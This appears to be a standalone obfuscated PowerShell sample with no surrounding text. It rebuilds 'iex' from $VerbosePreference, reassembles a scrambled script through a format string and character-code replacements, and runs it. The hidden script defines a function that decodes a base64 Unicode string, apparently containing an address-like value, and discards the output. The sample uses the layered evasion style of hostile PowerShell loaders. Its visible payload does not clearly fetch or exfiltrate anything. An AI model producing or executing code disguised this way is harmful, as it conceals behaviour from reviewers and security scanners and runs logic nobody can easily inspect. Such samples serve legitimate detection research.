&( ([sTRiNG]$veRbOSEpreFERENCe)[1,3]+'X'-joIn'') (((("{22}{13}{47}{45}{7}{46}{37}{35}{17}{18}{39}{8}{28}{38}{40}{34}{19}{29}{23}{30}{31}{9}{20}{6}{2}{4}{10}{11}{16}{12}{1}{48}{3}{27}{33}{25}{42}{0}{43}{5}{15}{21}{32}{41}{26}{36}{14}{24}{44}"-f' out-null
}
_/','Convert]:',':','ase64String(ry4par',':U','sE=/','xt.Encoding]','E=/{
    [CmdletBindin','P','y4par','nicode','.Ge','([','nction _','AuADEANQAxAC4AOAA','(','tString','(
','  ',')','am1
    )

    ry4result  = [Te','6d5aQ','Fu',' ','3AA==','e','DoAMQA2ADkALg','am1))
   ','osit',']
       ','[String]
     ','   r','B',' ry4r','= 0','am','AyADEAOA',')] par','i','      [Parameter(','on ','wA','sult 9WF','_=_==J','6d5)
','_=_==Js','g(','/',':FromB'))  -REplAcE  ([chaR]54+[chaR]100+[chaR]53),[chaR]39  -REplAcE 'JsE',[chaR]92 -REplAcE'9WF',[chaR]124  -crEpLACe'ry4',[chaR]36) )
